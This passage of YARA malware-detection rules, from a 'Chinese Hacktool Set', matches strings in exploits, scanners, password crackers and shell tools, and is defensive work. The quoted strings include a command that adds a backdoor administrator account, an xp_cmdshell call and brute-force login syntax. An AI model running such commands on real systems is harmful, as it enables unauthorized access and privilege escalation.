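        hash = "5cf8caba170ec461c44394f4058669d225a94285"
    strings:
        $s0 = "\\svchost.exe" fullword ascii
        $s2 = "%s%08x.001" fullword ascii
        $s3 = "Qy001Service" fullword ascii
        $s4 = "/.MIKY" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 300KB and all of them
}

rule Dos_Down64 {
    meta:
        description = "Chinese Hacktool Set - file Down64.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "43e455e43b49b953e17a5b885ffdcdf8b6b23226"
    strings:
        $s1 = "C:\\Windows\\Temp\\Down.txt" fullword wide
        $s2 = "C:\\Windows\\Temp\\Cmd.txt" fullword wide
        $s3 = "C:\\Windows\\Temp\\" fullword wide
        $s4 = "ProcessXElement" fullword ascii
        $s8 = "down.exe" fullword wide
        $s20 = "set_Timer1" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 150KB and all of them
}

rule epathobj_exp32 {
    meta:
        description = "Chinese Hacktool Set - file epathobj_exp32.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "ed86ff44bddcfdd630ade8ced39b4559316195ba"
    strings:
        $s0 = "Watchdog thread %d waiting on Mutex" fullword ascii
        $s1 = "Exploit ok run command" fullword ascii
        $s2 = "\\epathobj_exp\\Release\\epathobj_exp.pdb" fullword ascii
        $s3 = "Alllocated userspace PATHRECORD () %p" fullword ascii
        $s4 = "Mutex object did not timeout, list not patched" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 270KB and all of them
}

rule Tools_unknown {
    meta:
        description = "Chinese Hacktool Set - file unknown.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "4be8270c4faa1827177e2310a00af2d5bcd2a59f"
    strings:
        $s1 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide
        $s2 = "GET /ok.asp?id=1__sql__ HTTP/1.1" fullword ascii
        $s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii /* PEStudio Blacklist: agent */
        $s4 = "Failed to clear tab control Failed to delete tab at index %d\"Failed to retrieve" wide
        $s5 = "Host: 127.0.0.1" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 2500KB and 4 of them
}

rule PLUGIN_AJunk {
    meta:
        description = "Chinese Hacktool Set - file AJunk.dll"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "eb430fcfe6d13b14ff6baa4b3f59817c0facec00"
    strings:
        $s1 = "AJunk.dll" fullword ascii
        $s2 = "AJunk.DLL" fullword wide
        $s3 = "AJunk Dynamic Link Library" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 560KB and all of them
}

rule IISPutScanner {
    meta:
        description = "Chinese Hacktool Set - file IISPutScanner.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "9869c70d6a9ec2312c749aa17d4da362fa6e2592"
    strings:
        /* $s2..$s22 are ordinary import-table names; individually they carry no
           signal, the rule only works as the full combination (all of them)
           inside the 350KB..500KB size window below. */
        $s2 = "KERNEL32.DLL" fullword ascii
        $s3 = "ADVAPI32.DLL" fullword ascii
        $s4 = "VERSION.DLL" fullword ascii
        $s5 = "WSOCK32.DLL" fullword ascii
        $s6 = "COMCTL32.DLL" fullword ascii
        $s7 = "GDI32.DLL" fullword ascii
        $s8 = "SHELL32.DLL" fullword ascii
        $s9 = "USER32.DLL" fullword ascii
        $s10 = "OLEAUT32.DLL" fullword ascii
        $s11 = "LoadLibraryA" fullword ascii
        $s12 = "GetProcAddress" fullword ascii
        $s13 = "VirtualProtect" fullword ascii
        $s14 = "VirtualAlloc" fullword ascii
        $s15 = "VirtualFree" fullword ascii
        $s16 = "ExitProcess" fullword ascii
        $s17 = "RegCloseKey" fullword ascii
        $s18 = "GetFileVersionInfoA" fullword ascii
        $s19 = "ImageList_Add" fullword ascii
        $s20 = "BitBlt" fullword ascii
        $s21 = "ShellExecuteA" fullword ascii
        $s22 = "ActivateKeyboardLayout" fullword ascii
        $s23 = "BBABORT" fullword wide
        $s25 = "BBCANCEL" fullword wide
        $s26 = "BBCLOSE" fullword wide
        $s27 = "BBHELP" fullword wide
        $s28 = "BBIGNORE" fullword wide
        $s29 = "PREVIEWGLYPH" fullword wide
        $s30 = "DLGTEMPLATE" fullword wide
        $s31 = "TABOUTBOX" fullword wide
        $s32 = "TFORM1" fullword wide
        $s33 = "MAINICON" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 500KB and filesize > 350KB and all of them
}

rule IDTools_For_WinXP_IdtTool_2 {
    meta:
        description = "Chinese Hacktool Set - file IdtTool.sys"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "07feb31dd21d6f97614118b8a0adf231f8541a67"
    strings:
        $s0 = "\\Device\\devIdtTool" fullword wide
        $s1 = "IoDeleteSymbolicLink" fullword ascii /* Goodware String - occured 467 times */
        $s3 = "IoDeleteDevice" fullword ascii /* Goodware String - occured 993 times */
        $s6 = "IoCreateSymbolicLink" fullword ascii /* Goodware String - occured 467 times */
        $s7 = "IoCreateDevice" fullword ascii /* Goodware String - occured 988 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 7KB and all of them
}

rule hkmjjiis6 {
    meta:
        description = "Chinese Hacktool Set - file hkmjjiis6.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "4cbc6344c6712fa819683a4bd7b53f78ea4047d7"
    strings:
        $s1 = "comspec" fullword ascii
        $s2 = "user32.dlly" ascii
        $s3 = "runtime error" ascii
        $s4 = "WinSta0\\Defau" ascii
        $s5 = "AppIDFlags" fullword ascii
        $s6 = "GetLag" fullword ascii
        $s7 = "* FROM IIsWebInfo" ascii
        $s8 = "wmiprvse.exe" ascii
        $s9 = "LookupAcc" ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 70KB and all of them
}

rule Dos_lcx {
    meta:
        description = "Chinese Hacktool Set - file lcx.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "b6ad5dd13592160d9f052bb47b0d6a87b80a406d"
    strings:
        $s0 = "c:\\Users\\careful_snow\\" ascii
        $s1 = "Desktop\\Htran\\Release\\Htran.pdb" ascii
        $s3 = "[SERVER]connection to %s:%d error" fullword ascii
        $s4 = "-tran <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
        $s6 = "=========== Code by lion & bkbll, Welcome to [url]http://www.cnhonker.com[/url] " ascii
        $s7 = "[-] There is a error...Create a new connection." fullword ascii
        $s8 = "[+] Accept a Client on port %d from %s" fullword ascii
        $s11 = "-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
        $s13 = "[+] Make a Connection to %s:%d...." fullword ascii
        $s16 = "-listen <ConnectPort> <TransmitPort>" fullword ascii
        $s17 = "[+] Waiting another Client on port:%d...." fullword ascii
        $s18 = "[+] Accept a Client on port %d from %s ......" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 100KB and 2 of them
}

rule x_way2_5_X_way {
    meta:
        description = "Chinese Hacktool Set - file X-way.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "8ba8530fbda3e8342e8d4feabbf98c66a322dac6"
    strings:
        $s0 = "TTFTPSERVERFRM" fullword wide
        $s1 = "TPORTSCANSETFRM" fullword wide
        $s2 = "TIISSHELLFRM" fullword wide
        $s3 = "TADVSCANSETFRM" fullword wide
        $s4 = "ntwdblib.dll" fullword ascii
        $s5 = "TSNIFFERFRM" fullword wide
        $s6 = "TCRACKSETFRM" fullword wide
        $s7 = "TCRACKFRM" fullword wide
        $s8 = "dbnextrow" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 1000KB and 5 of them
}

rule tools_Sqlcmd {
    meta:
        description = "Chinese Hacktool Set - file Sqlcmd.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "99d56476e539750c599f76391d717c51c4955a33"
    strings:
        $s0 = "[Usage]: %s <HostName|IP> <UserName> <Password>" fullword ascii
        $s1 = "=============By uhhuhy(Feb 18,2003) - http://www.cnhonker.net=============" fullword ascii /* PEStudio Blacklist: os */
        $s4 = "Cool! Connected to SQL server on %s successfully!" fullword ascii
        $s5 = "EXEC master..xp_cmdshell \"%s\"" fullword ascii
        $s6 = "=======================Sqlcmd v0.21 For HScan v1.20=======================" fullword ascii
        $s10 = "Error,exit!" fullword ascii
        $s11 = "Sqlcmd>" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 40KB and 3 of them
}

rule Sword1_5 {
    meta:
        description = "Chinese Hacktool Set - file Sword1.5.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "96ee5c98e982aa8ed92cb4cedb85c7fda873740f"
    strings:
        $s3 = "http://www.ip138.com/ip2city.asp" fullword wide
        $s4 = "http://www.md5decrypter.co.uk/feed/api.aspx?" fullword wide
        $s6 = "ListBox_Command" fullword wide
        $s13 = "md=7fef6171469e80d32c0559f88b377245&submit=MD5+Crack" fullword wide
        $s18 = "\\Set.ini" fullword wide
        $s19 = "OpenFileDialog1" fullword wide
        $s20 = " (*.txt)|*.txt" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 400KB and 4 of them
}

rule Tools_scan {
    meta:
        description = "Chinese Hacktool Set - file scan.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "c580a0cc41997e840d2c0f83962e7f8b636a5a13"
    strings:
        $s2 = "Shanlu Studio" fullword wide
        $s3 = "_AutoAttackMain" fullword ascii
        $s4 = "_frmIpToAddr" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 3000KB and all of them
}

rule Dos_c {
    meta:
        description = "Chinese Hacktool Set - file c.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "3deb6bd52fdac6d5a3e9a91c585d67820ab4df78"
    strings:
        $s0 = "!Win32 .EXE." fullword ascii
        $s1 = ".MPRESS1" fullword ascii
        $s2 = ".MPRESS2" fullword ascii
        $s3 = "XOLEHLP.dll" fullword ascii
        $s4 = "</body></html>" fullword ascii
        $s8 = "DtcGetTransactionManagerExA" fullword ascii /* Goodware String - occured 12 times */
        $s9 = "GetUserNameA" fullword ascii /* Goodware String - occured 305 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 100KB and all of them
}

rule arpsniffer {
    meta:
        description = "Chinese Hacktool Set - file arpsniffer.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "7d8753f56fc48413fc68102cff34b6583cb0066c"
    strings:
        $s1 = "SHELL" ascii
        $s2 = "PacketSendPacket" fullword ascii
        $s3 = "ArpSniff" ascii
        $s4 = "pcap_loop" fullword ascii /* Goodware String - occured 3 times */
        $s5 = "packet.dll" fullword ascii /* Goodware String - occured 4 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 120KB and all of them
}

rule pw_inspector_2 {
    meta:
        description = "Chinese Hacktool Set - file pw-inspector.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "e0a1117ee4a29bb4cf43e3a80fb9eaa63bb377bf"
    strings:
        $s1 = "Use for hacking: trim your dictionary file to the pw requirements of the target." fullword ascii
        $s2 = "Syntax: %s [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p " ascii
        $s3 = "PW-Inspector" fullword ascii
        $s4 = "i:o:m:M:c:lunps" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 100KB and 2 of them
}

rule datPcShare {
    meta:
        description = "Chinese Hacktool Set - file datPcShare.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "87acb649ab0d33c62e27ea83241caa43144fc1c4"
    strings:
        $s1 = "PcShare.EXE" fullword wide
        $s2 = "MZKERNEL32.DLL" fullword ascii
        $s3 = "PcShare" fullword wide
        $s4 = "QQ:4564405" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 500KB and all of them
}

rule Tools_xport {
    meta:
        description = "Chinese Hacktool Set - file xport.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "9584de562e7f8185f721e94ee3cceac60db26dda"
    strings:
        $s1 = "Match operate system failed, 0x%00004X:%u:%d(Window:TTL:DF)" fullword ascii
        $s2 = "Example: xport www.xxx.com 80 -m syn" fullword ascii
        $s3 = "%s - command line port scanner" fullword ascii
        $s4 = "xport 192.168.1.1 1-1024 -t 200 -v" fullword ascii
        $s5 = "Usage: xport <Host> <Ports Scope> [Options]" fullword ascii
        $s6 = ".\\port.ini" fullword ascii
        $s7 = "Port scan complete, total %d port, %d port is opened, use %d ms." fullword ascii
        $s8 = "Code by glacier <glacier@xfocus.org>" fullword ascii
        $s9 = "http://www.xfocus.org" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 100KB and 2 of them
}

rule Pc_xai {
    meta:
        description = "Chinese Hacktool Set - file xai.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "f285a59fd931ce137c08bd1f0dae858cc2486491"
    strings:
        $s1 = "Powered by CoolDiyer @ C.Rufus Security Team 05/19/2008 http://www.xcodez.com/" fullword wide
        $s2 = "%SystemRoot%\\System32\\" fullword ascii
        $s3 = "%APPDATA%\\" fullword ascii
        $s4 = "---- C.Rufus Security Team ----" fullword wide
        $s5 = "www.snzzkz.com" fullword wide
        $s6 = "%CommonProgramFiles%\\" fullword ascii
        $s7 = "GetRand.dll" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 3000KB and all of them
}

rule Radmin_Hash {
    meta:
        description = "Chinese Hacktool Set - file Radmin_Hash.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "be407bd5bf5bcd51d38d1308e17a1731cd52f66b"
    strings:
        $s1 = "<description>IEBars</description>" fullword ascii
        $s2 = "PECompact2" fullword ascii
        $s3 = "Radmin, Remote Administrator" fullword wide
        $s4 = "Radmin 3.0 Hash " fullword wide
        $s5 = "HASH1.0" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 600KB and all of them
}

rule OSEditor {
    meta:
        description = "Chinese Hacktool Set - file OSEditor.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "6773c3c6575cf9cfedbb772f3476bb999d09403d"
    strings:
        $s1 = "OSEditor.exe" fullword wide
        $s2 = "netsafe" wide
        $s3 = "OSC Editor" fullword wide
        $s4 = "GIF89" ascii
        $s5 = "Unlock" ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 100KB and all of them
}

rule GoodToolset_ms11011 {
    meta:
        description = "Chinese Hacktool Set - file ms11011.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "5ad7a4962acbb6b0e3b73d77385eb91feb88b386"
    strings:
        $s0 = "\\i386\\Hello.pdb" ascii
        $s1 = "OS not supported." fullword ascii
        $s3 = "Not supported." fullword wide /* Goodware String - occured 3 times */
        $s4 = "SystemDefaultEUDCFont" fullword wide /* Goodware String - occured 18 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 100KB and all of them
}

rule FreeVersion_release {
    meta:
        description = "Chinese Hacktool Set - file release.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "f42e4b5748e92f7a450eb49fc89d6859f4afcebb"
    strings:
        $s1 = "-->Got WMI process Pid: %d " ascii
        $s2 = "This exploit will execute \"net user " ascii
        $s3 = "net user temp 123456 /add & net localgroup administrators temp /add" fullword ascii
        $s4 = "Running reverse shell" ascii
        $s5 = "wmiprvse.exe" fullword ascii
        $s6 = "SELECT * FROM IIsWebInfo" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 100KB and 3 of them
}

rule churrasco {
    meta:
        description = "Chinese Hacktool Set - file churrasco.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "a8d4c177948a8e60d63de9d0ed948c50d0151364"
    strings:
        $s1 = "Done, command should have ran as SYSTEM!" ascii
        $s2 = "Running command with SYSTEM Token..." ascii
        $s3 = "Thread impersonating, got NETWORK SERVICE Token: 0x%x" ascii
        $s4 = "Found SYSTEM token 0x%x" ascii
        $s5 = "Thread not impersonating, looking for another thread..." ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 150KB and 2 of them
}

rule x64_KiwiCmd {
    meta:
        description = "Chinese Hacktool Set - file KiwiCmd.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"
    strings:
        $s1 = "Process Ok, Memory Ok, resuming process :)" fullword wide
        $s2 = "Kiwi Cmd no-gpo" fullword wide
        $s3 = "KiwiAndCMD" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 400KB and 2 of them
}

rule sql1433_SQL {
    meta:
        description = "Chinese Hacktool Set - file SQL.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "025e87deadd1c50b1021c26cb67b76b476fafd64"
    strings:
        /* WIDE: ProductName 1433 */
        $s0 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 31 00 34 00 33 00 33 }
        /* WIDE: ProductVersion 1,4,3,3 */
        $s1 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 31 00 2C 00 34 00 2C 00 33 00 2C 00 33 }
    condition:
        uint16(0) == 0x5a4d and filesize < 90KB and all of them
}

rule CookieTools2 {
    meta:
        description = "Chinese Hacktool Set - file CookieTools2.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "cb67797f229fdb92360319e01277e1345305eb82"
    strings:
        $s1 = "www.gxgl.com&www.gxgl.net" fullword wide
        $s2 = "ip.asp?IP=" fullword ascii
        $s3 = "MSIE 5.5;" fullword ascii
        $s4 = "SOFTWARE\\Borland\\" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 700KB and all of them
}

rule cyclotron {
    meta:
        description = "Chinese Hacktool Set - file cyclotron.sys"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "5b63473b6dc1e5942bf07c52c31ba28f2702b246"
    strings:
        $s1 = "\\Device\\IDTProt" fullword wide
        $s2 = "IoDeleteSymbolicLink" fullword ascii /* Goodware String - occured 467 times */
        $s3 = "\\??\\slIDTProt" fullword wide
        $s4 = "IoDeleteDevice" fullword ascii /* Goodware String - occured 993 times */
        $s5 = "IoCreateSymbolicLink" fullword ascii /* Goodware String - occured 467 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 3KB and all of them
}

rule xscan_gui {
    meta:
        description = "Chinese Hacktool Set - file xscan_gui.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "a9e900510396192eb2ba4fb7b0ef786513f9b5ab"
    strings:
        $s1 = "%s -mutex %s -host %s -index %d -config \"%s\"" fullword ascii
        $s2 = "www.target.com" fullword ascii
        $s3 = "%s\\scripts\\desc\\%s.desc" fullword ascii
        $s4 = "%c Active/Maximum host thread: %d/%d, Current/Maximum thread: %d/%d, Time(s): %l" ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 3000KB and all of them
}

rule CN_Tools_hscan {
    meta:
        description = "Chinese Hacktool Set - file hscan.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "17a743e40790985ececf5c66eaad2a1f8c4cffe8"
    strings:
        $s1 = "%s -f hosts.txt -port -ipc -pop -max 300,20 -time 10000" fullword ascii
        $s2 = "%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,20" fullword ascii
        $s3 = "%s -h www.target.com -all" fullword ascii
        $s4 = ".\\report\\%s-%s.html" fullword ascii
        $s5 = ".\\log\\Hscan.log" fullword ascii
        $s6 = "[%s]: Found cisco Enable password: %s !!!" fullword ascii
        $s7 = "%s@ftpscan#FTP Account: %s/[null]" fullword ascii
        $s8 = ".\\conf\\mysql_pass.dic" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 300KB and all of them
}

rule GoodToolset_pr {
    meta:
        description = "Chinese Hacktool Set - file pr.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "f6676daf3292cff59ef15ed109c2d408369e8ac8"
    strings:
        $s1 = "-->Got WMI process Pid: %d " ascii
        $s2 = "-->This exploit gives you a Local System shell " ascii
        $s3 = "wmiprvse.exe" fullword ascii
        $s4 = "Try the first %d time" fullword ascii
        $s5 = "-->Build&&Change By p " ascii
        $s6 = "root\\MicrosoftIISv2" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 200KB and all of them
}

rule hydra_7_4_1_hydra {
    meta:
        description = "Chinese Hacktool Set - file hydra.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "3411d0380a1c1ebf58a454765f94d4f1dd714b5b"
    strings:
        $s1 = "%d of %d target%s%scompleted, %lu valid password%s found" fullword ascii
        $s2 = "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD" fullword ascii
        $s3 = "hydra -P pass.txt target cisco-enable (direct console access)" fullword ascii
        $s4 = "[%d][smb] Host: %s Account: %s Error: PASSWORD EXPIRED" fullword ascii
        $s5 = "[ERROR] SMTP LOGIN AUTH, either this auth is disabled" fullword ascii
        $s6 = "\"/login.php:user=^USER^&pass=^PASS^&mid=123:incorrect\"" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them
}

rule CN_Tools_srss_2 {
    meta:
        description = "Chinese Hacktool Set - file srss.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "c418b30d004051bbf1b2d3be426936b95b5fea6f"
    strings:
        $x1 = "used pepack!" fullword ascii
        /* $s1..$s8 are generic loader imports; the rule's specificity comes from
           $x1 combined with the < 14KB size bound. */
        $s1 = "KERNEL32.dll" fullword ascii
        $s2 = "KERNEL32.DLL" fullword ascii
        $s3 = "LoadLibraryA" fullword ascii
        $s4 = "GetProcAddress" fullword ascii
        $s5 = "VirtualProtect" fullword ascii
        $s6 = "VirtualAlloc" fullword ascii
        $s7 = "VirtualFree" fullword ascii
        $s8 = "ExitProcess" fullword ascii
    condition:
        /* FIX: the original condition required "( $x1 at 0 )" together with
           uint16(0) == 0x5a4d. Both constrain offset 0 ("MZ" vs "used pepack!"),
           so the rule could never fire. $x1 is now required anywhere in the file;
           if the packer marker is known to sit at a fixed offset in the referenced
           sample, tighten this to "$x1 in (0..<OFFSET_PLACEHOLDER>)" after
           confirming it against that sample. */
        uint16(0) == 0x5a4d and $x1 and filesize < 14KB and all of ($s*)
}

rule Dos_NtGod {
    meta:
        description = "Chinese Hacktool Set - file NtGod.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "adefd901d6bbd8437116f0170b9c28a76d4a87bf"
    strings:
        $s0 = "\\temp\\NtGodMode.exe" ascii
        $s4 = "NtGodMode.exe" fullword ascii
        $s10 = "ntgod.bat" fullword ascii
        $s19 = "sfxcmd" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 250KB and all of them
}

rule CN_Tools_VNCLink {
    meta:
        description = "Chinese Hacktool Set - file VNCLink.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "cafb531822cbc0cfebbea864489eebba48081aa1"
    strings:
        $s1 = "C:\\temp\\vncviewer4.log" fullword ascii
        $s2 = "[BL4CK] Patched by redsand || http://blacksecurity.org" fullword ascii
        $s3 = "fake release extendedVkey 0x%x, keysym 0x%x" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 580KB and 2 of them
}

rule tools_NTCmd {
    meta:
        description = "Chinese Hacktool Set - file NTCmd.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "a3ae8659b9a673aa346a60844208b371f7c05e3c"
    strings:
        $s1 = "pipecmd \\\\%s -U:%s -P:\"\" %s" fullword ascii
        $s2 = "[Usage]: %s <HostName|IP> <Username> <Password>" fullword ascii
        $s3 = "pipecmd \\\\%s -U:%s -P:%s %s" fullword ascii
        $s4 = "============By uhhuhy (Feb 18,2003) - http://www.cnhonker.net============" fullword ascii /* PEStudio Blacklist: os */
        $s5 = "=======================NTcmd v0.11 for HScan v1.20=======================" fullword ascii
        $s6 = "NTcmd>" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 80KB and 2 of them
}

rule mysql_pwd_crack {
    meta:
        description = "Chinese Hacktool Set - file mysql_pwd_crack.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "57d1cb4d404688804a8c3755b464a6e6248d1c73"
    strings:
        $s1 = "mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txt" fullword ascii
        $s2 = "Successfully --> username %s password %s " fullword ascii
        $s3 = "zhouzhen@gmail.com http://zhouzhen.eviloctal.org" fullword ascii
        $s4 = "-a automode automatic crack the mysql password " fullword ascii
        $s5 = "mysql_pwd_crack 127.0.0.1 -x 3306 -a" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 100KB and 1 of them
}

rule CmdShell64 {
    meta:
        description = "Chinese Hacktool Set - file CmdShell64.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "5b92510475d95ae5e7cd6ec4c89852e8af34acf1"
    strings:
        $s1 = "C:\\Windows\\System32\\JAVASYS.EXE" fullword wide
        $s2 = "ServiceCmdShell" fullword ascii
        $s3 = "<!-- If your application is designed to work with Windows 8.1, uncomment the fol" ascii
        $s4 = "ServiceSystemShell" fullword wide
        $s5 = "[Root@CmdShell ~]#" fullword wide
        $s6 = "Hello Man 2015 !" fullword wide
        $s7 = "CmdShell" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 30KB and 4 of them
}

rule Ms_Viru_v {
    meta:
        description = "Chinese Hacktool Set - file v.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "ecf4ba6d1344f2f3114d52859addee8b0770ed0d"
    strings:
        $s1 = "c:\\windows\\system32\\command.com /c " fullword ascii
        $s2 = "Easy Usage Version -- Edited By: racle@tian6.com" fullword ascii
        $s3 = "OH,Sry.Too long command." fullword ascii
        $s4 = "Success! Commander." fullword ascii
        $s5 = "Hey,how can racle work without ur command ?" fullword ascii
        $s6 = "The exploit thread was unable to map the virtual 8086 address space" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 100KB and 3 of them
}

rule CN_Tools_Vscan {
    meta:
        description = "Chinese Hacktool Set - file Vscan.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "0365fe05e2de0f327dfaa8cd0d988dbb7b379612"
    strings:
        $s1 = "[+] Usage: VNC_bypauth <target> <scantype> <option>" fullword ascii
        $s2 = "========RealVNC <= 4.1.1 Bypass Authentication Scanner=======" fullword ascii
        $s3 = "[+] Type VNC_bypauth <target>,<scantype> or <option> for more informations" fullword ascii
        $s4 = "VNC_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,..." fullword ascii
        $s5 = "-vn:%-15s:%-7d connection closed" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 60KB and 2 of them
}

rule Dos_iis {
    meta:
        description = "Chinese Hacktool Set - file iis.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "61ffd2cbec5462766c6f1c44bd44eeaed4f3d2c7"
    strings:
        $s1 = "comspec" fullword ascii
        $s2 = "program terming" fullword ascii
        $s3 = "WinSta0\\Defau" fullword ascii
        $s4 = "* FROM IIsWebInfo" ascii
        $s5 = "www.icehack." ascii
        $s6 = "wmiprvse.exe" fullword ascii
        $s7 = "Pid: %d" ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 70KB and all of them
}

rule IISPutScannesr {
    meta:
        description = "Chinese Hacktool Set - file IISPutScannesr.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "2dd8fee20df47fd4eed5a354817ce837752f6ae9"
    strings:
        $s1 = "yoda & M.o.D." ascii
        $s2 = "-> come.to/f2f **************" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 500KB and all of them
}

rule Generate {
    meta:
        description = "Chinese Hacktool Set - file Generate.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "2cb4c3916271868c30c7b4598da697f59e9c7a12"
    strings:
        $s1 = "C:\\TEMP\\" fullword ascii
        $s2 = "Connection Closed Gracefully.;Could not bind socket. Address and port are alread" wide
        $s3 = "$530 Please login with USER and PASS." fullword ascii
        $s4 = "_Shell.exe" fullword ascii
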